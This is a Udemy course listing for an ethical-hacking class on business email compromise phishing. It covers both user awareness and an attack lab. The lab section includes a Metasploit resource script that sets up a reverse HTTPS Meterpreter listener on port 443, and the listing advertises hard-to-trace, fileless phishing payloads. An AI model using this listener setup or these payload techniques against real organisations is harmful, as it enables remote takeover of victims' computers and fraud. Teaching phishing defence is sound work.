Ethical hacking - Phishing on Business Email Compromise 101
3.7 (3 ratings)
Instead of using a simple lifetime average, Udemy calculates a course's star rating by considering a number of different factors such as the number of ratings, the age of ratings, and the likelihood of fraudulent ratings.
1,212 students enrolled
Wishlisted Wishlist

Please confirm that you want to add Ethical hacking - Phishing on Business Email Compromise 101 to your Wishlist.

Add to Wishlist

Ethical hacking - Phishing on Business Email Compromise 101

Both Security awareness and technical area of phishing will be covered
3.7 (3 ratings)
Instead of using a simple lifetime average, Udemy calculates a course's star rating by considering a number of different factors such as the number of ratings, the age of ratings, and the likelihood of fraudulent ratings.
1,212 students enrolled
Created by Pareto Siu
Last updated 7/2017
English
Current price: $10 Original price: $20 Discount: 50% off
5 hours left at this price!
30-Day Money-Back Guarantee
Includes:
  • 33 mins on-demand video
  • 6 Supplemental Resources
  • Full lifetime access
  • Access on mobile and TV
  • Certificate of Completion
What Will I Learn?
  • Security awareness on phishing attack.
  • Technically make the demo on Phishing attack
  • How hacker gather information to the target company ?
  • Learn how to add payload to email and phishing
  • How to educate the users to avoid being phishing
View Curriculum
Requirements
  • Basic understanding of using VMs and setup Network connection of VMs
  • Basic usage of Kali Linux
  • Want to know prevention of phishing
Description

This course will cover the basic to advanced phishing techniques on business email compromise. You will learn the attack from attacker 's view and know how to defence.

Security Awareness topic:

  1. Basic information 
  2. Information Resources
  3. How to begin as email scammer
  4. What is spoof of Domain
  5. How to defence

Technical area:

1. Lab on how to setup phishing attack

After this course, you will learn more on security awareness and know how to teach your staff preventing phishing. 

Also, if you are learning ethical hacking, this lab will make you know how to setup phishing attack with below features:

a. Fileless attack and difficult to trace

b. 443 port attack and not easy to block

Who is the target audience?
  • College Students
  • Cyber Security Professionals
Students Who Viewed This Course Also Viewed
Curriculum For This Course
+
Main
6 Lectures 21:05

Briefly mention what will cover in this course

Preview 02:08

Students can reference the excel file and do the demo as same as the video. Any questions can ask here, I can provide sample excel as well if needed.

Preview 05:01


Security Awareness: How to begin as Evil
02:19

Security Awareness: What is spoof of Domain
02:52

Security Awareness: How to Defense
03:12
+
Lab : Phishing Email Attack
3 Lectures 12:18

Environment Setup:

1. Download the VMs and run in the same machine.

VM for Windows: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Choose Windows 10 and suitable for your VM solution.'

VM for Kali : https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

2. Download the zip file 

Excel file store in Window VM

Payload file store in Kali VM

3. Create rc script file in Kali VM

demo_web.rc :
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <<Kali VM ip address>>
set LPORT 443

Phishing Email
02:49

Metasploit setup
04:04

What action can do and troubleshoot
05:25
About the Instructor
Pareto Siu
3.7 Average rating
3 Reviews
1,212 Students
1 Course
Ethical Hacking, Malware Anaylsis

Hello Learners ,

I am Pareto . I am a web Security Researcher working in the field of Cyber Security focusing on pen testing, malware analysis and IOT hacking. 

My strengths are:-

◆ Vulnerability Assessment ◆ Penetration Testing ◆ Wi-Fi Assessment ◆ Intrusion Detection ◆Risk's Identification ◆ Data Analysis ◆ Report and Briefing.

Best Security Tools I have used :-

Class-Dump-Z, Cycript, GNU Debugger, Fiddler, Nmap, Wikto, Brutus, WireShark, Burp Proxy, Paros Proxy, Cain and Abel, John the Ripper, Hydra, Metasploit, netcat, openssl, ike tools, Back track tools, Nessus, IBM-AppScan, Acunetix, Nikto, NetSparker, MicrosoftBaseline Security Analyzer (MBSA), Web Securify, Nipper.

Platforms - Windows, Linux operating System.

            

Thanks.

Pareto